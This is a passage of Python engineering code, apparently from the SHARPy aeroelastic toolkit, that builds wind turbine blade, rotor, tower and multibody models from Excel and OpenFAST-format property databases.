node_r, elem_r = create_node_radial_pos_from_elem_centres(Radius,
blade.StructuralInformation.num_node,
blade.StructuralInformation.num_elem,
blade.StructuralInformation.num_node_elem)
node_prebending = np.interp(node_r,Radius,PrecrvRef)
node_presweept = np.interp(node_r,Radius,PreswpRef)
node_structural_twist = -1.0*np.interp(node_r,Radius,StrcTwst)
# Stiffness
elem_EA = np.interp(elem_r,Radius,EAStff)
elem_EIy = np.interp(elem_r,Radius,FlpStff)
elem_EIz = np.interp(elem_r,Radius,EdgStff)
elem_GJ = np.interp(elem_r,Radius,GJStff)
# Stiffness: estimate unknown properties
print('WARNING: The poisson cofficient is supossed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((blade.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,2]=np.interp(elem_r,Radius,FlpcgOf)
elem_pos_cg_B[:,1]=np.interp(elem_r,Radius,EdgcgOf)
elem_mass_per_unit_length = np.interp(elem_r,Radius,BMassDen)
elem_mass_iner_y = np.interp(elem_r,Radius,FlpIner)
elem_mass_iner_z = np.interp(elem_r,Radius,EdgIner)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Generate blade structural properties
blade.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
blade.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = create_blade_coordinates(blade.StructuralInformation.num_node, node_r, node_prebending, node_presweept)
blade.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = blade.StructuralInformation.num_node_elem,
num_node = blade.StructuralInformation.num_node,
num_elem = blade.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = blade.StructuralInformation.stiffness_db,
mass_db = blade.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = node_structural_twist,
num_lumped_mass = 0)
# Boundary conditions
blade.StructuralInformation.boundary_conditions = np.zeros((blade.StructuralInformation.num_node), dtype = int)
blade.StructuralInformation.boundary_conditions[0] = 1
blade.StructuralInformation.boundary_conditions[-1] = -1
######################################################################
### AERODYNAMICS
######################################################################
# Read blade aerodynamic information from excel file
excel_aero_r = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'Rnodes')
excel_aerodynamic_twist = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'AeroTwst')*deg2rad
excel_chord = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'Chord')
pure_airfoils_names = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'Airfoil_Table')
# Read coordinates of the pure airfoils
n_elem_aero = len(excel_aero_r)
# TODO: change this with a list of thickness and pure airfoils
pure_airfoils_camber=np.zeros((n_elem_aero,n_points_camber,2),)
xls = pd.ExcelFile(excel_file_name)
excel_db = pd.read_excel(xls, sheet_name=excel_sheet_airfoil_coord)
for iairfoil in range(len(pure_airfoils_names)):
# Look for the NaN
icoord=2
while(not(math.isnan(excel_db["%s_x" % pure_airfoils_names[iairfoil]][icoord]))):
icoord+=1
if(icoord==len(excel_db["%s_x" % pure_airfoils_names[iairfoil]])):
break
# Compute the camber of the airfoil
pure_airfoils_camber[iairfoil,:,0], pure_airfoils_camber[iairfoil,:,1] = gc.get_airfoil_camber(excel_db["%s_x" % pure_airfoils_names[iairfoil]][2:icoord] , excel_db["%s_y" % pure_airfoils_names[iairfoil]][2:icoord], n_points_camber)
# Basic variables
n_elem_aero = len(excel_aero_r)
num_airfoils = blade.StructuralInformation.num_node
surface_distribution = np.zeros((blade.StructuralInformation.num_elem), dtype=int)
# Interpolate in the correct positions
node_chord=np.interp(node_r, excel_aero_r, excel_chord)
node_aero_twist = -1.0*(np.interp(node_r, excel_aero_r, excel_aerodynamic_twist) + node_structural_twist)
node_sweep = np.ones((blade.StructuralInformation.num_node), )*np.pi
node_elastic_axis=np.ones((blade.StructuralInformation.num_node,))*0.25
# Define the nodes with aerodynamic properties
# Look for the first element that is goint to be aerodynamic
first_aero_elem=0
while (elem_r[first_aero_elem]<=excel_aero_r[0]):
first_aero_elem+=1
first_aero_node=first_aero_elem*(blade.StructuralInformation.num_node_elem-1)
aero_node = np.zeros((blade.StructuralInformation.num_node,), dtype=bool)
aero_node[first_aero_node:]=np.ones((blade.StructuralInformation.num_node-first_aero_node,),dtype=bool)
airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber(pure_airfoils_camber,excel_aero_r, node_r, n_points_camber)
# Write SHARPy format
airfoil_distribution = np.linspace(0,blade.StructuralInformation.num_node-1,blade.StructuralInformation.num_node, dtype=int)
blade.AerodynamicInformation.create_aerodynamics_from_vec(blade.StructuralInformation,
aero_node,
node_chord,
node_aero_twist,
node_sweep,
chord_panels,
surface_distribution,
m_distribution,
node_elastic_axis,
airfoil_distribution,
airfoils)
######################################################################
## ROTOR
######################################################################
# Read from excel file
numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'NumberOfBlades')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Tilt')*deg2rad
cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Cone')*deg2rad
# pitch = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Pitch')*deg2rad
# Apply coning
blade.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), cone)
# Build the whole rotor
rotor = blade.copy()
for iblade in range(numberOfBlades-1):
blade2 = blade.copy()
blade2.StructuralInformation.rotate_around_origin(np.array([0.,0.,1.]), (iblade+1)*(360.0/numberOfBlades)*deg2rad)
rotor.assembly(blade2)
blade2 = None
rotor.remove_duplicated_points(tol_remove_points)
# Apply tilt
rotor.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), -tilt)
######################################################################
## TOWER
######################################################################
# Read from excel file
Elevation = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'Elevation')
TMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TMassDen')
TwFAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAStif')
TwSSStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSStif')
TwGJStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwGJStif')
TwEAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwEAStif')
TwFAIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAIner')
TwSSIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSIner')
TwFAcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAcgOf')
TwSScgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSScgOf')
# Define the TOWER
tower = gc.AeroelasticInformation()
tower.StructuralInformation.num_elem = len(Elevation) - 2
tower.StructuralInformation.num_node_elem = 3
tower.StructuralInformation.compute_basic_num_node()
# Interpolate excel variables into the correct locations
node_r, elem_r = create_node_radial_pos_from_elem_centres(Elevation,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem,
tower.StructuralInformation.num_node_elem)
# Stiffness
elem_EA = np.interp(elem_r,Elevation,TwEAStif)
elem_EIz = np.interp(elem_r,Elevation,TwSSStif)
elem_EIy = np.interp(elem_r,Elevation,TwFAStif)
elem_GJ = np.interp(elem_r,Elevation,TwGJStif)
# Stiffness: estimate unknown properties
print('WARNING: The poisson cofficient is supossed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
elem_mass_per_unit_length = np.interp(elem_r,Elevation,TMassDen)
elem_mass_iner_y = np.interp(elem_r,Elevation,TwFAIner)
elem_mass_iner_z = np.interp(elem_r,Elevation,TwSSIner)
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((tower.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,1]=np.interp(elem_r,Elevation,TwSScgOf)
elem_pos_cg_B[:,2]=np.interp(elem_r,Elevation,TwFAcgOf)
# Stiffness: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Create the tower
tower.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
tower.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
coordinates = np.zeros((tower.StructuralInformation.num_node,3),)
coordinates[:,0] = node_r
tower.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = tower.StructuralInformation.num_node_elem,
num_node = tower.StructuralInformation.num_node,
num_elem = tower.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = tower.StructuralInformation.stiffness_db,
mass_db = tower.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = np.zeros((tower.StructuralInformation.num_node,),),
num_lumped_mass = 1)
tower.StructuralInformation.boundary_conditions = np.zeros((tower.StructuralInformation.num_node), dtype = int)
tower.StructuralInformation.boundary_conditions[0] = 1
# Read overhang and nacelle properties from excel file
overhang_len = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'overhang')
HubMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'HubMass')
NacelleMass = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleMass')
NacelleYawIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_nacelle, 'NacelleYawIner')
# Include nacelle mass
tower.StructuralInformation.lumped_mass_nodes = np.array([tower.StructuralInformation.num_node-1], dtype=int)
tower.StructuralInformation.lumped_mass = np.array([NacelleMass], dtype=float)
tower.AerodynamicInformation.set_to_zero(tower.StructuralInformation.num_node_elem,
tower.StructuralInformation.num_node,
tower.StructuralInformation.num_elem)
# Assembly overhang with the tower
overhang = gc.AeroelasticInformation()
overhang.StructuralInformation.num_node = 3
overhang.StructuralInformation.num_node_elem = 3
overhang.StructuralInformation.compute_basic_num_elem()
node_pos = np.zeros((overhang.StructuralInformation.num_node,3), )
node_pos[:,0] += tower.StructuralInformation.coordinates[-1,0]
node_pos[:,0] += np.linspace(0.,overhang_len*np.sin(tilt*deg2rad), overhang.StructuralInformation.num_node)
node_pos[:,2] = np.linspace(0.,-overhang_len*np.cos(tilt*deg2rad), overhang.StructuralInformation.num_node)
# TODO: change the following by real values
# Same properties as the last element of the tower
print("WARNING: Using the structural properties of the last tower section for the overhang")
oh_mass_per_unit_length = tower.StructuralInformation.mass_db[-1,0,0]
oh_mass_iner = tower.StructuralInformation.mass_db[-1,3,3]
oh_EA = tower.StructuralInformation.stiffness_db[-1,0,0]
oh_GA = tower.StructuralInformation.stiffness_db[-1,1,1]
oh_GJ = tower.StructuralInformation.stiffness_db[-1,3,3]
oh_EI = tower.StructuralInformation.stiffness_db[-1,4,4]
overhang.StructuralInformation.generate_uniform_sym_beam(node_pos,
oh_mass_per_unit_length,
oh_mass_iner,
oh_EA,
oh_GA,
oh_GJ,
oh_EI,
num_node_elem = 3,
y_BFoR = 'y_AFoR',
num_lumped_mass=0)
overhang.StructuralInformation.boundary_conditions = np.zeros((overhang.StructuralInformation.num_node), dtype = int)
overhang.StructuralInformation.boundary_conditions[-1] = -1
overhang.AerodynamicInformation.set_to_zero(overhang.StructuralInformation.num_node_elem,
overhang.StructuralInformation.num_node,
overhang.StructuralInformation.num_elem)
tower.assembly(overhang)
tower.remove_duplicated_points(tol_remove_points)
######################################################################
## WIND TURBINE
######################################################################
# Assembly the whole case
wt = tower.copy()
hub_position = tower.StructuralInformation.coordinates[-1,:]
rotor.StructuralInformation.coordinates += hub_position
wt.assembly(rotor)
# Redefine the body numbers
wt.StructuralInformation.body_number *= 0
wt.StructuralInformation.body_number[tower.StructuralInformation.num_elem:wt.StructuralInformation.num_elem] += 1
######################################################################
## MULTIBODY
######################################################################
# Define the boundary condition between the rotor and the tower tip
LC1 = gc.LagrangeConstraint()
LC1.behaviour = 'hinge_node_FoR_constant_vel'
LC1.node_in_body = tower.StructuralInformation.num_node-1
LC1.body = 0
LC1.body_FoR = 1
LC1.rot_axisB = np.array([1.,0.,0.0])
LC1.rot_vel = -rotation_velocity
LC = []
LC.append(LC1)
# Define the multibody infromation for the tower and the rotor
MB1 = gc.BodyInformation()
MB1.body_number = 0
MB1.FoR_position = np.zeros((6,),)
MB1.FoR_velocity = np.zeros((6,),)
MB1.FoR_acceleration = np.zeros((6,),)
MB1.FoR_movement = 'prescribed'
MB1.quat = np.array([1.0,0.0,0.0,0.0])
MB2 = gc.BodyInformation()
MB2.body_number = 1
MB2.FoR_position = np.array([rotor.StructuralInformation.coordinates[0, 0], rotor.StructuralInformation.coordinates[0, 1], rotor.StructuralInformation.coordinates[0, 2], 0.0, 0.0, 0.0])
MB2.FoR_velocity = np.array([0.,0.,0.,0.,0.,rotation_velocity])
MB2.FoR_acceleration = np.zeros((6,),)
MB2.FoR_movement = 'free'
MB2.quat = algebra.euler2quat(np.array([0.0,tilt,0.0]))
MB = []
MB.append(MB1)
MB.append(MB2)
######################################################################
## RETURN
######################################################################
return wt, LC, MB
######################################################################
# FROM OpenFAST database
######################################################################
def rotor_from_OpenFAST_db(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_OpenFAST.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_coord = 'airfoil_coord',
m_distribution = 'uniform',
h5_cross_sec_prop = None,
n_points_camber = 100,
tol_remove_points = 1e-3):
"""
generate_from_OpenFAST_db
Function needed to generate a wind turbine from an excel database according to OpenFAST inputs
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str):
excel_sheet_structural_blade (str):
excel_sheet_aero_blade (str):
excel_sheet_airfoil_coord (str):
excel_sheet_parameters (str):
h5_cross_sec_prop (str): h5 containing mass and stiffness matrices along the blade.
m_distribution (str):
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
rotor (sharpy.utils.generate_cases.AeroelasticInfromation): Aeroelastic infrmation of the rotor
Note:
- h5_cross_sec_prop is a path to a h5 containing the following groups:
- str_prop: with:
- K: list of 6x6 stiffness matrices
- M: list of 6x6 mass matrices
- radius: radial location (including hub) of K and M matrices
- when h5_cross_sec_prop is not None, mass and stiffness properties are
interpolated at BlFract location specified in "excel_sheet_structural_blade"
"""
######################################################################
## BLADE
######################################################################
blade = gc.AeroelasticInformation()
######################################################################
### STRUCTURE
######################################################################
# Read blade structural information from excel file
BlFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BlFract')
PitchAxis = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PitchAxis')
# TODO: implement pitch axsi
# print("WARNING: PitchAxis not implemented")
# StrcTwst= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'StrcTwst')*deg2rad
BMassDen= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'BMassDen')
FlpStff= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpStff')
EdgStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgStff')
# Missing the following variables
GJStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'GJStff')
EAStff = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EAStff')
Alpha = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'Alpha')
FlpIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpIner')
EdgIner= gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgIner')
#PrecrvRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PrecrvRef')
#PreswpRef = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'PreswpRef')
FlpcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpcgOf')
EdgcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgcgOf')
FlpEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'FlpEAOf')
EdgEAOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_blade, 'EdgEAOf')
# From the aerodynamic sheet
excel_aero_r = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlSpn')
BlCrvAC = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlCrvAC')
BlSwpAC = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlSwpAC')
BlCrvAng = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlCrvAng')
if not (BlCrvAng == 0.).all():
# TODO: implement this angle
print("ERROR: BlCrvAng not implemented, assumed to be zero")
BlTwist = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlTwist')*deg2rad
# Blade parameters
TipRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'TipRad')
HubRad = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'HubRad')
# Interpolate excel variables into the correct locations
# Geometry
Radius = HubRad + BlFract*(TipRad - HubRad)
excel_aero_r += HubRad
include_hub_node = True
if include_hub_node:
Radius = np.concatenate((np.array([0.]), Radius),)
PitchAxis = np.concatenate((np.array([PitchAxis[0]]), PitchAxis),)
BMassDen = np.concatenate((np.array([BMassDen[0]]), BMassDen),)
FlpStff = np.concatenate((np.array([FlpStff[0]]), FlpStff),)
EdgStff = np.concatenate((np.array([EdgStff[0]]), EdgStff),)
GJStff = np.concatenate((np.array([GJStff[0]]), GJStff),)
EAStff = np.concatenate((np.array([EAStff[0]]), EAStff),)
Alpha = np.concatenate((np.array([Alpha[0]]), Alpha),)
FlpIner = np.concatenate((np.array([FlpIner[0]]), FlpIner),)
EdgIner = np.concatenate((np.array([EdgIner[0]]), EdgIner),)
FlpcgOf = np.concatenate((np.array([FlpcgOf[0]]), FlpcgOf),)
EdgcgOf = np.concatenate((np.array([EdgcgOf[0]]), EdgcgOf),)
FlpEAOf = np.concatenate((np.array([FlpEAOf[0]]), FlpEAOf),)
EdgEAOf = np.concatenate((np.array([EdgEAOf[0]]), EdgEAOf),)
# Base parameters
use_excel_struct_as_elem = False
if use_excel_struct_as_elem:
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_elem = len(Radius) - 2
blade.StructuralInformation.compute_basic_num_node()
node_r, elem_r = create_node_radial_pos_from_elem_centres(Radius,
blade.StructuralInformation.num_node,
blade.StructuralInformation.num_elem,
blade.StructuralInformation.num_node_elem)
else:
# Use excel struct as nodes
# Check the number of nodes
blade.StructuralInformation.num_node_elem = 3
blade.StructuralInformation.num_node = len(Radius)
if ((len(Radius) - 1) % (blade.StructuralInformation.num_node_elem - 1)) == 0:
blade.StructuralInformation.num_elem = int((len(Radius) - 1)/(blade.StructuralInformation.num_node_elem - 1))
node_r = Radius
elem_r = Radius[1::2] + 0.
else:
print("ERROR: Cannot build ", blade.StructuralInformation.num_node_elem, "-noded elements from ", blade.StructuralInformation.num_node, "nodes")
# TODO: how is this defined now?
node_prebending = np.interp(node_r,excel_aero_r,BlCrvAC)
# node_presweept = np.interp(node_r,excel_aero_r,BlSwpAC)
print("WARNING: Check the implementation for presweept blades")
node_presweept = np.zeros_like(node_r)
# node_structural_twist = -1.0*np.interp(node_r,Radius,StrcTwst)
node_structural_twist = -1.0*np.interp(node_r,excel_aero_r,BlTwist)
node_pitch_axis = np.interp(node_r,Radius,PitchAxis)
coordinates = create_blade_coordinates(blade.StructuralInformation.num_node, node_r, node_prebending, node_presweept)
if h5_cross_sec_prop is None:
# Stiffness
elem_EA = np.interp(elem_r,Radius,EAStff)
elem_EIy = np.interp(elem_r,Radius,FlpStff)
elem_EIz = np.interp(elem_r,Radius,EdgStff)
elem_GJ = np.interp(elem_r,Radius,GJStff)
# Stiffness: estimate unknown properties
print('WARNING: The poisson cofficient is supossed equal to 0.3')
print('WARNING: Cross-section area is used as shear area')
poisson_coef = 0.3
elem_GAy = elem_EA/2.0/(1.0+poisson_coef)
elem_GAz = elem_EA/2.0/(1.0+poisson_coef)
# Inertia
# TODO: check yz axis and Flap-edge
elem_pos_cg_B = np.zeros((blade.StructuralInformation.num_elem,3),)
elem_pos_cg_B[:,2]=np.interp(elem_r,Radius,FlpcgOf)
elem_pos_cg_B[:,1]=np.interp(elem_r,Radius,EdgcgOf)
elem_mass_per_unit_length = np.interp(elem_r,Radius,BMassDen)
elem_mass_iner_y = np.interp(elem_r,Radius,FlpIner)
elem_mass_iner_z = np.interp(elem_r,Radius,EdgIner)
# Inertia: estimate unknown properties
print('WARNING: Using perpendicular axis theorem to compute the inertia around xB')
elem_mass_iner_x = elem_mass_iner_y + elem_mass_iner_z
# Generate blade structural properties
blade.StructuralInformation.create_mass_db_from_vector(elem_mass_per_unit_length, elem_mass_iner_x, elem_mass_iner_y, elem_mass_iner_z, elem_pos_cg_B)
blade.StructuralInformation.create_stiff_db_from_vector(elem_EA, elem_GAy, elem_GAz, elem_GJ, elem_EIy, elem_EIz)
else: # read Mass/Stiffness from database
cross_prop=h5.readh5(h5_cross_sec_prop).str_prop
# create mass_db/stiffness_db (interpolate at mid-node of each element)
blade.StructuralInformation.mass_db = scint.interp1d(
cross_prop.radius, cross_prop.M, kind='cubic', copy=False, assume_sorted=True, axis=0)(node_r[1::2])
blade.StructuralInformation.stiffness_db = scint.interp1d(
cross_prop.radius, cross_prop.K, kind='cubic', copy=False, assume_sorted=True, axis=0)(node_r[1::2])
blade.StructuralInformation.generate_1to1_from_vectors(
num_node_elem = blade.StructuralInformation.num_node_elem,
num_node = blade.StructuralInformation.num_node,
num_elem = blade.StructuralInformation.num_elem,
coordinates = coordinates,
stiffness_db = blade.StructuralInformation.stiffness_db,
mass_db = blade.StructuralInformation.mass_db,
frame_of_reference_delta = 'y_AFoR',
vec_node_structural_twist = node_structural_twist,
num_lumped_mass = 0)
# Boundary conditions
blade.StructuralInformation.boundary_conditions = np.zeros((blade.StructuralInformation.num_node), dtype = int)
blade.StructuralInformation.boundary_conditions[0] = 1
blade.StructuralInformation.boundary_conditions[-1] = -1
######################################################################
### AERODYNAMICS
######################################################################
# Read blade aerodynamic information from excel file
# excel_aerodynamic_twist = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlTwist')*deg2rad
excel_chord = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlChord')
pure_airfoils_names = gc.read_column_sheet_type01(excel_file_name, excel_sheet_aero_blade, 'BlAFID')
# Read coordinates of the pure airfoils
n_elem_aero = len(excel_aero_r)
# TODO: change this with a list of thickness and pure airfoils
pure_airfoils_camber=np.zeros((n_elem_aero,n_points_camber,2),)
xls = pd.ExcelFile(excel_file_name)
excel_db = pd.read_excel(xls, sheet_name=excel_sheet_airfoil_coord)
for iairfoil in range(len(pure_airfoils_names)):
# Look for the NaN
icoord=2
while(not(math.isnan(excel_db["%s_x" % pure_airfoils_names[iairfoil]][icoord]))):
icoord+=1
if(icoord==len(excel_db["%s_x" % pure_airfoils_names[iairfoil]])):
break
# Compute the camber of the airfoil
pure_airfoils_camber[iairfoil,:,0], pure_airfoils_camber[iairfoil,:,1] = gc.get_airfoil_camber(excel_db["%s_x" % pure_airfoils_names[iairfoil]][2:icoord] , excel_db["%s_y" % pure_airfoils_names[iairfoil]][2:icoord], n_points_camber)
# Basic variables
n_elem_aero = len(excel_aero_r)
num_airfoils = blade.StructuralInformation.num_node
surface_distribution = np.zeros((blade.StructuralInformation.num_elem), dtype=int)
# Interpolate in the correct positions
node_chord=np.interp(node_r, excel_aero_r, excel_chord)
# node_aero_twist = -1.0*(np.interp(node_r, excel_aero_r, excel_aerodynamic_twist) + node_structural_twist)
node_sweep = np.ones((blade.StructuralInformation.num_node), )*np.pi
# node_elastic_axis=np.ones((blade.StructuralInformation.num_node,))*0.25
# Define the nodes with aerodynamic properties
# Look for the first element that is goint to be aerodynamic
first_aero_elem=0
while (elem_r[first_aero_elem]<=excel_aero_r[0]):
first_aero_elem+=1
first_aero_node=first_aero_elem*(blade.StructuralInformation.num_node_elem-1)
aero_node = np.zeros((blade.StructuralInformation.num_node,), dtype=bool)
aero_node[first_aero_node:]=np.ones((blade.StructuralInformation.num_node-first_aero_node,),dtype=bool)
airfoils = blade.AerodynamicInformation.interpolate_airfoils_camber(pure_airfoils_camber,excel_aero_r, node_r, n_points_camber)
# Write SHARPy format
airfoil_distribution = np.linspace(0,blade.StructuralInformation.num_node-1,blade.StructuralInformation.num_node, dtype=int)
blade.AerodynamicInformation.create_aerodynamics_from_vec(blade.StructuralInformation,
aero_node,
node_chord,
np.zeros_like(node_chord),
node_sweep,
chord_panels,
surface_distribution,
m_distribution,
node_pitch_axis,
airfoil_distribution,
airfoils)
######################################################################
## ROTOR
######################################################################
# Read from excel file
numberOfBlades = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'NumBl')
tilt = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'ShftTilt')*deg2rad
cone = gc.read_column_sheet_type01(excel_file_name, excel_sheet_parameters, 'Cone')*deg2rad
# pitch = gc.read_column_sheet_type01(excel_file_name, excel_sheet_rotor, 'Pitch')*deg2rad
# Apply pitch
blade.StructuralInformation.rotate_around_origin(np.array([1.,0.,0.]), -pitch_deg*deg2rad)
# Apply coning
blade.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), -cone)
# Build the whole rotor
rotor = blade.copy()
for iblade in range(numberOfBlades-1):
blade2 = blade.copy()
blade2.StructuralInformation.rotate_around_origin(np.array([0.,0.,1.]), (iblade+1)*(360.0/numberOfBlades)*deg2rad)
rotor.assembly(blade2)
blade2 = None
rotor.remove_duplicated_points(tol_remove_points)
# Apply tilt
rotor.StructuralInformation.rotate_around_origin(np.array([0.,1.,0.]), tilt)
return rotor
def generate_from_OpenFAST_db(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= 'database_OpenFAST.xlsx',
excel_sheet_parameters = 'parameters',
excel_sheet_structural_blade = 'structural_blade',
excel_sheet_aero_blade = 'aero_blade',
excel_sheet_airfoil_coord = 'airfoil_coord',
excel_sheet_structural_tower = 'structural_tower',
m_distribution = 'uniform',
n_points_camber = 100,
tol_remove_points = 1e-3):
"""
generate_from_OpenFAST_db
Function needed to generate a wind turbine from an excel database according to OpenFAST inputs
Args:
chord_panels (int): Number of panels on the blade surface in the chord direction
rotation_velocity (float): Rotation velocity of the rotor
pitch_deg (float): pitch angle in degrees
excel_file_name (str):
excel_sheet_structural_blade (str):
excel_sheet_aero_blade (str):
excel_sheet_airfoil_coord (str):
excel_sheet_parameters (str):
excel_sheet_structural_tower (str):
m_distribution (str):
n_points_camber (int): number of points to define the camber of the airfoil,
tol_remove_points (float): maximum distance to remove adjacent points
Returns:
wt (sharpy.utils.generate_cases.AeroelasticInfromation): Aeroelastic infrmation of the wind turbine
LC (list): list of all the Lagrange constraints needed in the cases (sharpy.utils.generate_cases.LagrangeConstraint)
MB (list): list of the multibody information of each body (sharpy.utils.generate_cases.BodyInfrmation)
"""
rotor = rotor_from_OpenFAST_db(chord_panels,
rotation_velocity,
pitch_deg,
excel_file_name= excel_file_name,
excel_sheet_parameters = excel_sheet_parameters,
excel_sheet_structural_blade = excel_sheet_structural_blade,
excel_sheet_aero_blade = excel_sheet_aero_blade,
excel_sheet_airfoil_coord = excel_sheet_airfoil_coord,
m_distribution = m_distribution,
n_points_camber = n_points_camber,
tol_remove_points = tol_remove_points)
######################################################################
## TOWER
######################################################################
# Read from excel file
HtFract = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'HtFract')
TMassDen = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TMassDen')
TwFAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAStif')
TwSSStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSStif')
# TODO> variables to be defined
TwGJStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwGJStif')
TwEAStif = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwEAStif')
TwFAIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAIner')
TwSSIner = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSSIner')
TwFAcgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwFAcgOf')
TwSScgOf = gc.read_column_sheet_type01(excel_file_name, excel_sheet_structural_tower, 'TwSScgOf')
# Define the TOWER
